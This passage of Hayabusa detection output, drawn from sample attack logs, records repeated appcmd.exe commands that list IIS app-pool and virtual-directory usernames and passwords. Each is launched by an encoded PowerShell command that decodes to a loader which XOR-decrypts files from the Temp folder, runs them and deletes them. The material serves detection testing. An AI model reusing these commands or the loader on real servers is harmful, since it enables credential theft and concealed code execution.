Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 
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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.731 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Filename: redirection.config"" /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.811 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.891 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 
10:29:17.971 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Line Number: 0"" /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AY
QBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.041 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Line Number: 0"" /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.121 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 
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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.202 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBk
AHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.282 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Description: Cannot read configuration file due to insufficient permissions"" /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.352 +09:00,IEWIN7,1,informational,Process Creation,"Command: 
""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Description: Cannot read configuration file due to insufficient permissions"" /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.432 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.522 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.662 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool "". 
)"" /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.742 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool "". )"" /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQg
B5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.822 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:vdir.name : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential 
Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.893 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""ERROR ( message:Configuration error "" /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.973 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""ERROR ( message:Configuration error "" /text:password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 
JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYA
OAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:19.063 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:userName : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:19.143 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:19.233 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Filename: redirection.config"" /text:userName : Path: 
